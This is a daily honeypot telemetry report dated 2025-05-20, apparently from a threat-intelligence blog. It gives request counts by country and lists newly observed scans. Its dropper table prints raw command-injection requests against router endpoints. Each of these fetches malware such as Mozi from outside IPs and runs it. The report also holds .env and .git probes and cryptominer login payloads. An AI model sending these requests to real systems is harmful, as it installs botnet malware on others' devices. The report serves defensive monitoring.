Skip to main content
  1. Daily-Posts/

Report: 2025-05-20

·411 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-20
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 24 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1198 requests were recorded during the day, originating from 6 different countries, with a peak of 340 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
BRGermany
USGermany
USGermany
SGGermany
USGermany
USDubai
PTGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
104.236.3.45GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1
123.129.129.145GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.129.129.145:46263/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
141.98.11.147GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/payload1.sh+-O-+
103.48.66.213GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.48.66.213:41686/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
141.98.11.128GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1
117.251.167.23527;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1332GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1
1531GET /symfony/_profiler/.env HTTP/1.1
1551GET /sapi/debug/default/.env HTTP/1.1
1561GET /frontend/web/debug/default/.env HTTP/1.1
1571GET /Admins/.env HTTP/1.1
1581GET /Ads/.env HTTP/1.1
1591GET /Alpha/.env HTTP/1.1
2171\x00\x0E8F\x07^`7\xA5\x8F3\x00\x00\x00\x00\x00
2201\x00\x0E8\xBD\xCC\xF2Px0\x9F\xF6\x00\x00\x00\x00\x00
2211{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x00ec91cd401c52c518d40061c20fc10b0ec4a67a\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
2221{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2246PjJDrYonFdyUfWcXtj9rBhhs8ZBfpdxcEVYoze7sREMK1C6b5fguyRQSUhkwMXaxdpw54CWNTLTMef5wQccwkxC4JEMeo\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
2491\x00\x0E8L\x8A8’bR\x12\xC1\x00\x00\x00\x00\x00
2781GET /Base/.env HTTP/1.1
2791GET /Beta/.env HTTP/1.1
2801GET /Blogs/.env HTTP/1.1
2981GET /Boot/.env HTTP/1.1
2991GET /Bot/.env HTTP/1.1
3001GET /Build/.env HTTP/1.1
3031GET /DuAb HTTP/1.1
3041GET /QzBP HTTP/1.1
3421POST /goform/umountUSBPartition HTTP/1.1
4111GET /gateway/.git/config HTTP/1.1
4121GET /57.129/.git/config HTTP/1.1
4131GET /61/.git/config HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0340US
1282BG
285GB
381PL
464NL
552CN
647KR
743PT
829SC
925HK
1021CH
1119DE
1213IN
1313AZ
1411SE
1510IL
1610BR
178SG
187LT
197AO
206RO
214BE
223CA
232TH
242MD
252GH
262AR
272VE
282KW
291FR
301ES
311RU
321JP
331LV
341CZ

Related

Report: 2025-05-19
·443 words
Repport Daily
Report: 2025-05-18
·4142 words
Repport Daily
Report: 2025-05-17
·313 words
Repport Daily